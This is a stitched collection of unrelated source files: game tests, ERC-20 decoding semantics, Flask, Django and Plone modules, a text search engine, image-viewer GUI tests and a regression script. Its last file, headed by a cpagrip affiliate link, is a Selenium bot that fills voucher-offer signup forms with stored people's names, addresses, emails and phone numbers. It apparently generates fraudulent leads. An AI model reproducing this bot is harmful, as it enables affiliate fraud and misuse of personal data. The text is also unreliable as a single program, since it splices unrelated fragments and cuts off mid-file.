        self.assertEqual((dX,dY),(0.5,34.5))
        #Ghost 4, in scatter mode, targets top right corner
        self.ghost4.state=DrawingGenerics.GHOST_STATE['Scatter']
        dX,dY = self.ghost4.destinationTile()
        self.assertEqual((dX,dY),(25.5,0.5))
        #Ghost(any) is eaten
        self.ghost1.state=DrawingGenerics.GHOST_STATE['Eaten']
        dX,dY = self.ghost1.destinationTile()
        self.assertEqual((dX,dY),(14,14.5))
# Copyright 2021 DAI Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ethtx.models.semantics_model import (
EventSemantics,
ParameterSemantics,
TransformationSemantics,
FunctionSemantics,
)
# --- ERC-20 event semantics ---------------------------------------------
# Transfer(address indexed src, address indexed dst, uint256 value)
erc20_transfer_event = EventSemantics(
    signature="0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef",
    anonymous=False,
    name="Transfer",
    parameters=[
        ParameterSemantics(
            parameter_name="src", parameter_type="address", indexed=True
        ),
        ParameterSemantics(
            parameter_name="dst", parameter_type="address", indexed=True
        ),
        ParameterSemantics(
            parameter_name="value", parameter_type="uint256", indexed=False
        ),
    ],
)
# Scale the raw token amount by the token's decimals for display.
erc20_transfer_event_transformation = {
    "__input2__": TransformationSemantics(
        transformation="__input2__ / 10**token_decimals(__contract__)"
    )
}
# Approval(address indexed src, address indexed dst, uint256 value)
erc20_approval_event = EventSemantics(
    signature="0x8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925",
    anonymous=False,
    name="Approval",
    parameters=[
        ParameterSemantics(
            parameter_name="src", parameter_type="address", indexed=True
        ),
        ParameterSemantics(
            parameter_name="dst", parameter_type="address", indexed=True
        ),
        ParameterSemantics(
            parameter_name="value", parameter_type="uint256", indexed=False
        ),
    ],
)
erc20_approval_event_transformation = {
    "__input2__": TransformationSemantics(
        transformation="__input2__ / 10**token_decimals(__contract__)"
    )
}
# --- ERC-20 function semantics ------------------------------------------
# transfer(address recipient, uint256 amount) -> bool
erc20_transfer_function = FunctionSemantics(
    signature="0xa9059cbb",
    name="transfer",
    inputs=[
        ParameterSemantics(parameter_name="recipient", parameter_type="address"),
        ParameterSemantics(parameter_name="amount", parameter_type="uint256"),
    ],
    outputs=[ParameterSemantics(parameter_name="", parameter_type="bool")],
)
erc20_transfer_function_transformation = {
    "__input1__": TransformationSemantics(
        transformation="__input1__ / 10**token_decimals(__contract__)"
    )
}
# transferFrom(address sender, address recipient, uint256 amount) -> bool
erc20_transferFrom_function = FunctionSemantics(
    signature="0x23b872dd",
    name="transferFrom",
    inputs=[
        ParameterSemantics(parameter_name="sender", parameter_type="address"),
        ParameterSemantics(parameter_name="recipient", parameter_type="address"),
        ParameterSemantics(parameter_name="amount", parameter_type="uint256"),
    ],
    outputs=[ParameterSemantics(parameter_name="", parameter_type="bool")],
)
erc20_transferFrom_function_transformation = {
    "__input2__": TransformationSemantics(
        transformation="__input2__ / 10**token_decimals(__contract__)"
    )
}
# approve(address spender, uint256 amount) -> bool
erc20_approve_function = FunctionSemantics(
    signature="0x095ea7b3",
    name="approve",
    inputs=[
        ParameterSemantics(parameter_name="spender", parameter_type="address"),
        ParameterSemantics(parameter_name="amount", parameter_type="uint256"),
    ],
    outputs=[ParameterSemantics(parameter_name="", parameter_type="bool")],
)
erc20_approve_function_transformation = {
    "__input1__": TransformationSemantics(
        transformation="__input1__ / 10**token_decimals(__contract__)"
    )
}
# balanceOf(address holder) -> uint256
erc20_balanceOf_function = FunctionSemantics(
    signature="0x70a08231",
    name="balanceOf",
    inputs=[ParameterSemantics(parameter_name="holder", parameter_type="address")],
    outputs=[ParameterSemantics(parameter_name="", parameter_type="uint256")],
)
erc20_balanceOf_function_transformation = {
    "__output0__": TransformationSemantics(
        transformation="__output0__ / 10**token_decimals(__contract__)"
    )
}
# totalSupply() -> uint256
erc20_totalSupply_function = FunctionSemantics(
    signature="0x18160ddd",
    name="totalSupply",
    inputs=[],
    outputs=[ParameterSemantics(parameter_name="", parameter_type="uint256")],
)
erc20_totalSupply_function_transformation = {
    "__output0__": TransformationSemantics(
        transformation="__output0__ / 10**token_decimals(__contract__)"
    )
}
# --- Lookup tables keyed by event/function signature --------------------
ERC20_EVENTS = {
    erc20_transfer_event.signature: erc20_transfer_event,
    erc20_approval_event.signature: erc20_approval_event,
}
ERC20_FUNCTIONS = {
    erc20_transfer_function.signature: erc20_transfer_function,
    erc20_transferFrom_function.signature: erc20_transferFrom_function,
    erc20_approve_function.signature: erc20_approve_function,
    erc20_balanceOf_function.signature: erc20_balanceOf_function,
    erc20_totalSupply_function.signature: erc20_totalSupply_function,
}
ERC20_TRANSFORMATIONS = {
    erc20_transfer_event.signature: erc20_transfer_event_transformation,
    erc20_approval_event.signature: erc20_approval_event_transformation,
    erc20_transfer_function.signature: erc20_transfer_function_transformation,
    erc20_transferFrom_function.signature: erc20_transferFrom_function_transformation,
    erc20_approve_function.signature: erc20_approve_function_transformation,
    erc20_balanceOf_function.signature: erc20_balanceOf_function_transformation,
    erc20_totalSupply_function.signature: erc20_totalSupply_function_transformation,
}
|
# -*- coding:utf-8 -*-
from model import db
class ApnsUser(db.Model):
    """Maps a user to an APNs (Apple Push Notification service) device token."""

    id = db.Column(db.Integer, primary_key=True)
    # Owning user; the backref exposes user.apns_users as a lazy query.
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    user = db.relationship('User', backref=db.backref('apns_users', lazy='dynamic'))
    apns_token = db.Column(db.VARCHAR(255))
    # Timestamps maintained by the database server, not the application.
    created_at = db.Column(db.DateTime, server_default=db.func.now())
    updated_at = db.Column(db.DateTime, server_default=db.func.now(), onupdate=db.func.now())

    def __init__(self, user, apns_token):
        self.user = user
        self.apns_token = apns_token
|
#!/usr/bin/env python
import os
import sys
# This bootstraps the virtualenv so that the system Python can use it.
app_root = os.path.dirname(os.path.realpath(__file__))
activate_this = os.path.join(app_root, 'bin', 'activate_this.py')
# `execfile` only exists on Python 2 and leaves the file handle open;
# exec(compile(...)) is the portable equivalent and closes the file
# deterministically via the context manager.
with open(activate_this) as f:
    exec(compile(f.read(), activate_this, 'exec'), dict(__file__=activate_this))

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "capomastro.settings")
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
|
import pandas as pd
import numpy as np
import numpy.linalg as LA # operasi baris elementer
from sklearn.feature_extraction.text import CountVectorizer # tf-idf
from sklearn.feature_extraction.text import TfidfTransformer, TfidfVectorizer # tf-idf
from sklearn.metrics.pairwise import cosine_similarity # cosine similarity
from nltk.corpus import stopwords # preprocessing
from nltk.stem import PorterStemmer # preprocessing bahasa inggris
from Sastrawi.StopWordRemover.StopWordRemoverFactory import StopWordRemoverFactory # preprocessing
from Sastrawi.Stemmer.StemmerFactory import StemmerFactory #preprocessing
import string # ya buat string
# NLP helper singletons shared by the preprocessing functions below.
stemmer = StemmerFactory().create_stemmer()  # Indonesian stemmer (Sastrawi)
remover = StopWordRemoverFactory().create_stop_word_remover()  # Indonesian stop-word remover (Sastrawi)
translator = str.maketrans('', '', string.punctuation)  # table that strips all ASCII punctuation
def stemmerEN(text):
    """English preprocessing: lower-case *text*, drop English stop words
    and punctuation, then Porter-stem the result.

    Returns the processed string.
    """
    porter = PorterStemmer()
    stop = set(stopwords.words('english'))
    # Lower-case once (the original lowered the text a redundant second
    # time while splitting) and filter out stop words.
    words = [w for w in text.lower().split() if w not in stop]
    text = ' '.join(words)
    # Strip punctuation using the module-level translation table.
    preprocessed_text = text.translate(translator)
    return porter.stem(preprocessed_text)
def preprocess(text):
    """Full preprocessing pipeline: Indonesian stop-word removal and
    stemming, followed by the English pipeline in ``stemmerEN``."""
    without_stopwords = remover.remove(text.lower())
    stemmed = stemmer.stem(without_stopwords)
    return stemmerEN(stemmed)
class Engine:
    """A minimal vector-space search engine.

    Documents are registered with :meth:`addDocument` and queries with
    :meth:`setQuery`; :meth:`process_score` then returns the cosine
    similarity between every query and every document.
    """

    def __init__(self):
        self.cosine_score = []  # kept for backwards compatibility; unused
        self.train_set = []     # corpus documents
        self.test_set = []      # queries

    def addDocument(self, word):
        """Append a dataset document to the corpus."""
        self.train_set.append(word)

    def setQuery(self, word):
        """Append a query string to the query list."""
        self.test_set.append(word)

    def process_score(self):
        """Score every query against every document.

        Returns:
            list[list[float]]: ``output[i][j]`` is the cosine similarity
            (rounded to 3 decimals) between query ``i`` and document ``j``.
        """
        # Term-count vectors for corpus and queries; the vocabulary is
        # fitted on the corpus only.  (The previously created but unused
        # stop-word list and TfidfTransformer were removed.)
        vectorizer = CountVectorizer()
        train_vectors = vectorizer.fit_transform(self.train_set).toarray()
        test_vectors = vectorizer.transform(self.test_set).toarray()

        def cosine(a, b):
            # Cosine similarity, rounded to 3 decimal places.
            return round(np.inner(a, b) / (LA.norm(a) * LA.norm(b)), 3)

        # One result row per query; each row collects that query's
        # similarity to every document in insertion order.
        output = [[] for _ in test_vectors]
        for doc_vector in train_vectors:
            for row, query_vector in enumerate(test_vectors):
                output[row].append(cosine(doc_vector, query_vector))
        return output
from AccessControl import SecurityManagement
from Products.ATContentTypes.permission import ChangeTopics
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from plone.app.form.widgets.uberselectionwidget import UberSelectionWidget
from plone.app.portlets.portlets import base
from plone.app.vocabularies.catalog import SearchableTextSourceBinder
from plone.memoize.instance import memoize
from plone.portlets.interfaces import IPortletDataProvider
from zope import schema
from zope.component import getMultiAdapter
from zope.formlib import form
from zope.i18nmessageid import MessageFactory
from zope.interface import implements
try:
    from plone.app.collection.interfaces import ICollection
except ImportError:
    # plone.app.collection is optional; fall back to a marker interface
    # that nothing provides, so ICollection.providedBy() is always False.
    from zope.interface import Interface

    class ICollection(Interface):
        pass

# Translation message factory for this package's UI strings.
_ = MessageFactory('collective.banner')
class IBannerPortlet(IPortletDataProvider):
    """A portlet displaying a banners from a Collection's results
    """

    # Collection (or old-style Topic) whose results supply the banner items.
    target_collection = schema.Choice(
        title=_(u"Target collection"),
        description=_(u"Find the collection which provides the items to list"),
        required=True,
        source=SearchableTextSourceBinder(
            {'portal_type': ('Topic', 'Collection')},
            default_query='path:'))

    # Carousel rotation interval, in milliseconds.
    timer = schema.Int(
        title=_(u"Timer"),
        description=_(u"Carousel rotated time (milliseconds)"),
        required=False,
        default=10000)

    # Named image scale used when rendering the banner images.
    image_scale = schema.Choice(
        title=_(u'portlet_image_scale', default=u'Image Scale'),
        description=_(u'portlet_help_image_scale',
                      default=u'Select, which image scale should be used '
                      u'for the portlet, if there is any image.'),
        required=True,
        default=None,
        vocabulary="collective.banner.ImageScaleVocabulary",
    )
class Assignment(base.Assignment):
    """Portlet assignment: persists the configuration of one portlet."""
    implements(IBannerPortlet)

    # Class-level defaults keep previously persisted assignments working
    # when new fields are added.
    target_collection = None
    timer = 10000
    image_scale = None

    def __init__(self, target_collection=None, timer=10000, image_scale=None):
        self.target_collection = target_collection
        self.timer = timer
        self.image_scale = image_scale

    @property
    def title(self):
        # Shown in the "manage portlets" screen.
        return u"Banner portlet"
class Renderer(base.Renderer):
    """Renders the banner carousel from the configured collection."""

    render = ViewPageTemplateFile('portlet.pt')

    def __init__(self, *args, **kwargs):
        super(Renderer, self).__init__(*args, **kwargs)
        # Expose the configured image scale to the banner tile through
        # the request, since the tile is rendered by traversal.
        self.request.set('banner_image_scale', self.data.image_scale)

    @property
    def available(self):
        # Hide the portlet when the collection yields no results.
        return len(self.results())

    @memoize
    def collection(self):
        """Resolve the configured collection path to an object (or None)."""
        cpath = self.data.target_collection
        if isinstance(cpath, basestring) and cpath.startswith('/'):
            cpath = cpath[1:]
        if not cpath:
            return None
        portal_state = getMultiAdapter((self.context, self.request),
                                       name=u'plone_portal_state')
        portal = portal_state.portal()
        if isinstance(cpath, unicode):
            # restrictedTraverse accepts only strings
            cpath = str(cpath)
        return portal.restrictedTraverse(cpath, default=None)

    def collection_url(self):
        """Return the collection's absolute URL, or None if unresolved."""
        collection = self.collection()
        if collection is None:
            return None
        else:
            return collection.absolute_url()

    @memoize
    def results(self):
        """Return the collection's catalog results (empty list if none)."""
        results = []
        collection = self.collection()
        if collection is not None:
            results = collection.queryCatalog()
        return results

    def get_tile(self, obj):
        """Render the 'banner-tile' view for *obj* and return its markup."""
        # When adapter is used this means we check whether obj has any special
        # instructions about how to be handled in defined view or interface;
        # for multi adapter the same is true except more objects than just the
        # obj are checked for instructions.
        # Have to use traverse to make zpt security work.
        tile = obj.unrestrictedTraverse("banner-tile")
        if tile is None:
            return None
        return tile()

    def edit_collection(self):
        """Return an edit URL for the collection if the user may edit it."""
        provider = self.collection()
        smanager = SecurityManagement.getSecurityManager()
        allowed = smanager.checkPermission(ChangeTopics, provider)
        if allowed:
            provider = self.collection()
            if provider is not None:
                # New-style Collections use the regular edit form; old
                # Topics have a dedicated criteria form.
                if ICollection.providedBy(provider):
                    return provider.absolute_url() + '/edit'
                return provider.absolute_url() + '/criterion_edit_form'
        return None
class AddForm(base.AddForm):
    """Form used to add a new banner portlet assignment."""

    form_fields = form.Fields(IBannerPortlet)
    # Friendlier search/browse widget for picking the collection.
    form_fields['target_collection'].custom_widget = UberSelectionWidget
    label = _(u"Add Banner Portlet")
    description = _(u"This portlet display a listing of items from a \
Collection as a banner carousel.")

    def create(self, data):
        # Instantiate the persistent assignment from the validated form data.
        return Assignment(**data)
class EditForm(base.EditForm):
    """Form used to edit an existing banner portlet assignment."""

    form_fields = form.Fields(IBannerPortlet)
    # Friendlier search/browse widget for picking the collection.
    form_fields['target_collection'].custom_widget = UberSelectionWidget
    label = _(u"Edit Banner Portlet")
    description = _(u"This portlet display a listing of items from a \
Collection as a banner carousel.")
import os
from functools import wraps
from qtpy import QtWidgets, QtCore
from pdsview import pdsview, channels_dialog, band_widget
# Sample PDS mission images used as test fixtures (paths relative to the
# repository root).
FILE_1 = os.path.join(
    'tests', 'mission_data', '2m132591087cfd1800p2977m2f1.img')
FILE_2 = os.path.join(
    'tests', 'mission_data', '2p129641989eth0361p2600r8m1.img')
FILE_3 = os.path.join(
    'tests', 'mission_data', '1p190678905erp64kcp2600l8c1.img')
FILE_4 = os.path.join(
    'tests', 'mission_data', 'h58n3118.img')
FILE_5 = os.path.join(
    'tests', 'mission_data', '1p134482118erp0902p2600r8m1.img')
FILE_6 = os.path.join(
    'tests', 'mission_data', '0047MH0000110010100214C00_DRCL.IMG')
test_files = [FILE_1, FILE_2, FILE_3, FILE_4, FILE_5, FILE_6]
# Bare file names, used to verify the display names shown in the dialog.
FILE_1_NAME = '2m132591087cfd1800p2977m2f1.img'
FILE_2_NAME = '2p129641989eth0361p2600r8m1.img'
FILE_3_NAME = '1p190678905erp64kcp2600l8c1.img'
FILE_4_NAME = 'h58n3118.img'
FILE_5_NAME = '1p134482118erp0902p2600r8m1.img'
FILE_6_NAME = '0047MH0000110010100214C00_DRCL.IMG'
class TestChannelsDialogModel(object):
    """Tests for ChannelsDialogModel.

    NOTE(review): the fixtures are class attributes, so every test method
    shares one window/model instance and may observe state mutated by an
    earlier test (e.g. the alpha values set in test_alphas).
    """

    test_images = pdsview.ImageSet(test_files)
    window = pdsview.PDSViewer(test_images)
    model = channels_dialog.ChannelsDialogModel(window)

    def test_init(self):
        # Fresh model: no registered views, first image selected, and one
        # band model per RGB channel with the expected name/index pairing.
        assert self.model._views == set()
        assert self.model.current_index == 0
        assert isinstance(self.model.rgb_models, tuple)
        assert len(self.model.rgb_models) == 3
        for model in self.model.rgb_models:
            assert isinstance(model, band_widget.BandWidgetModel)
        assert self.model.red_model.name == 'Red'
        assert self.model.red_model.rgb_index == 0
        assert self.model.green_model.name == 'Green'
        assert self.model.green_model.rgb_index == 1
        assert self.model.blue_model.name == 'Blue'
        assert self.model.blue_model.rgb_index == 2
        assert isinstance(self.model.menu_indices, list)
        assert self.model.menu_indices == [0, 1, 2]

    def test_images(self):
        # model.images flattens the window's image list to first bands.
        images = self.window.image_set.images
        expected_images = [image[0] for image in images]
        assert self.model.images == expected_images

    def test_rgb(self):
        assert self.model.rgb == self.window.image_set.rgb

    def test_image_names(self):
        # Image names come back in the image set's sorted order.
        names = [
            FILE_5_NAME, FILE_3_NAME, FILE_1_NAME, FILE_2_NAME, FILE_4_NAME
        ]
        assert self.model.image_names == names

    def test_rgb_names(self):
        rgb_names = [FILE_5_NAME, FILE_3_NAME, FILE_1_NAME]
        assert self.model.rgb_names == rgb_names

    def test_alphas(self):
        # Alpha percentages on the band models surface as 0..1 fractions.
        assert self.model.alphas == [1., 1., 1.]
        self.model.red_model.alpha_value = 75
        self.model.green_model.alpha_value = 50
        self.model.blue_model.alpha_value = 25
        assert self.model.alphas == [.75, .5, .25]
class TestChannelDialogController(object):
    """Tests for ChannelsDialogController.

    The model is NOT auto-synced with the main window: each test first
    changes window state, asserts the model is stale, then asserts the
    controller's explicit update call brings it in line.
    """

    test_images = pdsview.ImageSet(test_files)
    window = pdsview.PDSViewer(test_images)
    model = channels_dialog.ChannelsDialogModel(window)
    controller = channels_dialog.ChannelsDialogController(model, None)

    def test_init(self):
        assert self.controller.model == self.model
        assert self.controller.view is None

    def test_update_menus_indices(self):
        # Band-model index changes only reach menu_indices after the
        # controller syncs them.
        assert self.model.menu_indices == [0, 1, 2]
        self.model.red_model.update_index(1)
        self.model.green_model.update_index(3)
        self.model.blue_model.update_index(0)
        assert self.model.menu_indices == [0, 1, 2]
        self.controller.update_menu_indices()
        assert self.model.menu_indices == [1, 3, 0]

    def test_update_current_index(self):
        # Likewise, image navigation in the main window only reaches
        # current_index after an explicit controller update.
        assert self.model.current_index == 0
        self.model.main_window.controller.next_image()
        assert self.model.current_index == 0
        self.controller.update_current_index()
        assert self.model.current_index == 1
        self.model.main_window.controller.previous_image()
        assert self.model.current_index == 1
        self.controller.update_current_index()
        assert self.model.current_index == 0
class TestChannelsDialog(object):
    """GUI tests for the channels dialog (Qt widgets driven through qtbot)."""

    # Shared fixtures: one viewer + dialog reused by every test in the class.
    test_images = pdsview.ImageSet(test_files)
    window = pdsview.PDSViewer(test_images)
    window.channels_dialog()
    dialog = window.channels_window
    model = dialog.model
    window.show()

    def add_widget_wrapper(func):
        """Decorator: show the dialog and register it with qtbot before the test."""
        @wraps(func)
        def wrapper(self, qtbot):
            self.dialog.show()
            qtbot.addWidget(self.dialog)
            return func(self, qtbot)
        return wrapper

    @add_widget_wrapper
    def test_init(self, qtbot):
        """Dialog wiring: model/view registration, tree setup, band widgets."""
        assert self.dialog.model == self.model
        assert self.dialog in self.model._views
        assert isinstance(
            self.dialog.controller, channels_dialog.ChannelsDialogController
        )
        assert isinstance(self.dialog, QtWidgets.QDialog)
        assert isinstance(self.dialog.image_tree, QtWidgets.QTreeWidget)
        for item in self.dialog.items:
            assert isinstance(item, QtWidgets.QTreeWidgetItem)
        selection_mode = QtWidgets.QAbstractItemView.NoSelection
        assert self.dialog.image_tree.selectionMode() == selection_mode
        assert self.model.image_names == [
            item.text(0) for item in self.dialog.items]
        assert self.dialog.current_item.isSelected()
        assert isinstance(self.dialog.rgb_check_box, QtWidgets.QCheckBox)
        assert isinstance(self.dialog.red_widget, band_widget.BandWidget)
        assert isinstance(self.dialog.green_widget, band_widget.BandWidget)
        assert isinstance(self.dialog.blue_widget, band_widget.BandWidget)

    @add_widget_wrapper
    def test_current_item(self, qtbot):
        """current_item must track the viewer's next/previous image buttons."""
        assert self.dialog.current_item.text(0) == self.dialog.items[0].text(0)
        qtbot.mouseClick(self.window.next_image_btn, QtCore.Qt.LeftButton)
        assert self.model.current_index == 1
        assert self.dialog.current_item.text(0) == self.dialog.items[1].text(0)
        qtbot.mouseClick(self.window.previous_image_btn, QtCore.Qt.LeftButton)
        assert self.model.current_index == 0
        assert self.dialog.current_item.text(0) == self.dialog.items[0].text(0)

    # TODO: CANNOT TEST RGB UNTIL AN RGB IMAGE IS ADDED TO THE TEST DATA
    # @add_widget_wrapper
    # def test_check_rgb(self, qtbot)

    @add_widget_wrapper
    def test_change_image(self, qtbot):
        """Tree selection must follow image navigation, wrapping at the ends."""
        def check_selected(index1, index2):
            # index1 must be selected, index2 must not.
            assert self.dialog.items[index1].isSelected()
            assert not self.dialog.items[index2].isSelected()
        check_selected(0, 1)
        qtbot.mouseClick(self.window.next_image_btn, QtCore.Qt.LeftButton)
        check_selected(1, 0)
        qtbot.mouseClick(self.window.previous_image_btn, QtCore.Qt.LeftButton)
        check_selected(0, 1)
        # Stepping back from the first image wraps to the last (-1).
        qtbot.mouseClick(self.window.previous_image_btn, QtCore.Qt.LeftButton)
        check_selected(-1, 0)
        qtbot.mouseClick(self.window.next_image_btn, QtCore.Qt.LeftButton)
        check_selected(0, 1)

    @add_widget_wrapper
    def test_set_menus_index(self, qtbot):
        """set_menus_index must push model.menu_indices into the band menus."""
        widgets = [
            self.dialog.red_widget,
            self.dialog.green_widget,
            self.dialog.blue_widget
        ]
        def check_currentIndex():
            for widget, index in zip(widgets, self.model.menu_indices):
                assert widget.menu.currentIndex() == index
        self.model.menu_indices = [0, 1, 2]
        self.dialog.set_menus_index()
        check_currentIndex()
        r, g, b = 4, 0, 2
        self.model.menu_indices = [r, g, b]
        self.dialog.set_menus_index()
        check_currentIndex()
        # Restore the default assignment so later tests see a clean state.
        self.model.menu_indices = [0, 1, 2]
        self.dialog.set_menus_index()
        check_currentIndex()
        assert self.model.menu_indices == [0, 1, 2]

    @add_widget_wrapper
    def test_update_menus_current_item(self, qtbot):
        """Changing the image set's rgb bands must update models and menu text."""
        assert self.test_images.rgb == self.model.images[:3]
        r, g, b = 4, 0, 2
        new_rgb = [
            self.model.images[r], self.model.images[g], self.model.images[b]
        ]
        self.test_images.rgb = new_rgb
        self.dialog.update_menus_current_item()
        assert self.model.red_model.index == r
        assert self.model.green_model.index == g
        assert self.model.blue_model.index == b
        red_text = self.dialog.red_widget.menu.currentText()
        assert red_text == self.model.image_names[r]
        green_text = self.dialog.green_widget.menu.currentText()
        assert green_text == self.model.image_names[g]
        blue_text = self.dialog.blue_widget.menu.currentText()
        assert blue_text == self.model.image_names[b]
        # Restore the original band assignment for subsequent tests.
        self.test_images.rgb = self.model.images[:3]
        assert self.test_images.rgb == self.model.images[:3]

    @add_widget_wrapper
    def test_close_dialog(self, qtbot):
        """Closing must remember the dialog position and reopen there."""
        assert not self.window.channels_window_is_open
        qtbot.mouseClick(self.window.channels_button, QtCore.Qt.LeftButton)
        assert self.window.channels_window_is_open
        pos = self.dialog.pos()
        x, y = pos.x(), pos.y()
        new_pos = QtCore.QPoint(x + 5, y - 10)
        self.dialog.move(new_pos)
        qtbot.mouseClick(self.dialog.close_button, QtCore.Qt.LeftButton)
        assert not self.window.channels_window_is_open
        assert self.window.channels_window_pos == new_pos
        qtbot.mouseClick(self.window.channels_button, QtCore.Qt.LeftButton)
        assert self.window.channels_window_is_open
        assert self.dialog.pos() == new_pos
|
import pandas as pd
import sys
import numpy as np
import sklearn
from sklearn.tree import DecisionTreeRegressor
pd.set_option('display.max_rows', 11000)
np.set_printoptions(threshold=np.inf)
from sklearn.ensemble import AdaBoostRegressor,ExtraTreesRegressor,BaggingRegressor,RandomForestRegressor
# Test GDP data (path in argv[1]): headerless CSV read as country/year/value.
gdptest = pd.read_csv(sys.argv[1],names=['Country Name','year','gdpvalue'])
def meltfile(file, valuename):
    """Load a wide CSV (one column per year) and reshape it to long format.

    Returns a frame with columns ['Country Name', 'year', valuename].
    """
    wide = pd.read_csv(file)
    long_form = wide.melt(id_vars=['Country Name'])
    return long_form.rename(columns={'variable': 'year', 'value': valuename})
# Long-format training frames: life expectancy and GDP per (country, year).
life = meltfile('life expectancy by country and year.csv','lifevalue')
gdp = meltfile('GDP by country and year.csv','gdpvalue')
def impute(file, valuename):
    """Fill missing values of file[valuename] in place.

    Strategy: within each country carry the last known value forward, then
    backward; any value still missing (country entirely NaN) falls back to
    the mean of that year across all countries.
    """
    # Per-country forward/backward fill (ffill/bfill replace the deprecated
    # fillna(method=...) form).
    file[valuename] = file.groupby(['Country Name'])[valuename].ffill()
    file[valuename] = file.groupby(['Country Name'])[valuename].bfill()
    # BUG FIX: the original transformed the whole frame-level groupby and
    # assigned a DataFrame to a single column; select the column first.
    file[valuename] = file.groupby("year")[valuename].transform(
        lambda x: x.fillna(x.mean()))
# Fill gaps in every series before merging/training.
impute(gdp,'gdpvalue')
impute(life,'lifevalue')
impute(gdptest,'gdpvalue')

# Join the two measures on (country, year).
gl = pd.merge(life, gdp,on=['Country Name', 'year'])
gl['year'] = gl['year'].astype('int')

# One-hot encode the country and prepend the dummies to the frame.
get_dummy = pd.get_dummies(gl['Country Name'])
frames = [get_dummy,gl]
gl = pd.concat(frames,axis=1)

# One dummy-row per country (numeric columns dropped) to attach to the test set.
match = gl.iloc[:,:-3]
match = match.drop_duplicates('Country Name')
gettestdummy = gdptest.merge(gdptest.merge(match,how = 'left',on=['Country Name'],sort = False),sort=False)

# Reorder so the identifier/target columns sit at the end.
cols = list(gettestdummy.columns.values)
cols.pop(cols.index('Country Name'))
cols.pop(cols.index('year'))
cols.pop(cols.index('gdpvalue'))
gettestdummy = gettestdummy[cols+['Country Name','year','gdpvalue']]

# Features: country dummies + year + gdp; target: life expectancy.
train_x = gl.drop(['Country Name','gdpvalue','lifevalue'],axis = 1)
train_y = gl['lifevalue']
test_x = gettestdummy.drop(['Country Name', 'gdpvalue'],axis = 1)

# Earlier experiments (random forest / decision tree / CV) kept for reference:
# estimators = 10
# regressor = RandomForestRegressor(n_estimators=estimators)
# regressor.fit(train_x, train_y)
# predicted_y = regressor.predict(test_x)
# treereg = DecisionTreeRegressor(criterion='mse')
# treereg.fit(train_x, train_y)
# predtree_y = treereg.predict(test_x)
# print np.mean(sklearn.cross_validation.cross_val_score(treereg,
# train_x, train_y,cv = 10,scoring = 'mean_squared_error'))

# Final model: extra-trees regressor; one prediction per line to argv[2].
estimators = 10
treereg = ExtraTreesRegressor(n_estimators=estimators)
treereg.fit(train_x, train_y)
predtree_y = treereg.predict(test_x)
with open (sys.argv[2],'w') as f:
    for i in range(len(predtree_y)):
        f.write(str(predtree_y[i])+'\n')
|
'''
cpagrip
Get the Best Nutella Package!
http://zh.moneymethods.net/click.php?c=7&key=bbcprqa35ns2a5f44z14k2k3
Uspd
'''
from selenium import webdriver
from time import sleep
# import xlrd
import random
import os
import time
import sys
sys.path.append("..")
# import email_imap as imap
# import json
import re
# from urllib import request, parse
from selenium.webdriver.support.ui import Select
# import base64
import Chrome_driver
import email_imap as imap
import name_get
import db
import selenium_funcs
import Submit_handle
import random
def web_submit(submit,chrome_driver,debug=0):
    """Fill and submit the vouchersavenue.com signup form.

    Args:
        submit: dict with a 'Site' URL and an 'Uspd' record holding the
            identity fields (first/last name, address, zip, city, state,
            email, home_phone, date_of_birth).
        chrome_driver: a selenium webdriver instance (closed/quit before return).
        debug: when 1, override submit['Site'] with a hard-coded test URL.

    Returns:
        1 on a completed submission, 0 when the landing URL is not the
        expected vouchersavenue.com page.
    """
    # test
    if debug == 1:
        site = 'http://lub.lubetadating.com/c/13526/1?clickid=[clickid]&bid=[bid]&siteid=[siteid]&countrycode=[cc]&operatingsystem=[operatingsystem]&campaignid=[campaignid]&category=[category]&connection=[connection]&device=[device]&browser=[browser]&carrier=[carrier]'
        submit['Site'] = site
    chrome_driver.get(submit['Site'])
    chrome_driver.maximize_window()
    chrome_driver.refresh()
    # sleep(2000)
    # chrome_driver.find_element_by_xpath('').click()
    # chrome_driver.find_element_by_xpath('').send_keys(submit['Uspd']['state'])
    # Bail out if the redirect chain did not land on the expected offer page.
    if 'https://vouchersavenue.com/' not in chrome_driver.current_url:
        print('Url wrong!!!!!!!!!!!!!!!!!')
        chrome_driver.close()
        chrome_driver.quit()
        return 0
    # mrs mr — pick one of the two salutation radio buttons at random
    num_gender = random.randint(0,1)
    if num_gender == 0:
        chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[1]/div/div[1]/label').click()
    else:
        chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[1]/div/div[2]/label').click()
    # chrome_driver.find_element_by_xpath().click()
    # firstname
    chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[2]/input').send_keys(submit['Uspd']['first_name'])
    # lastname
    chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[3]/input').send_keys(submit['Uspd']['last_name'])
    # address
    chrome_driver.find_element_by_xpath('//*[@id="address"]').send_keys(submit['Uspd']['address'])
    # zipcode — typed digit by digit after normalization
    zipcode = Submit_handle.get_zip(submit['Uspd']['zip'])
    print('zipcode:',zipcode)
    for key in zipcode:
        chrome_driver.find_element_by_xpath('//*[@id="postal_code"]').send_keys(int(key))
    # city
    chrome_driver.find_element_by_xpath('//*[@id="locality"]').send_keys(submit['Uspd']['city'])
    # state
    s1 = Select(chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[7]/select'))
    s1.select_by_value(submit['Uspd']['state'])
    # email
    chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[8]/input').send_keys(submit['Uspd']['email'])
    # cellphone — typed digit by digit after float->int normalization
    cellphone = Submit_handle.chansfer_float_into_int(submit['Uspd']['home_phone'])
    print('cellphone:',cellphone)
    for key in cellphone:
        chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[9]/input').send_keys(int(key))
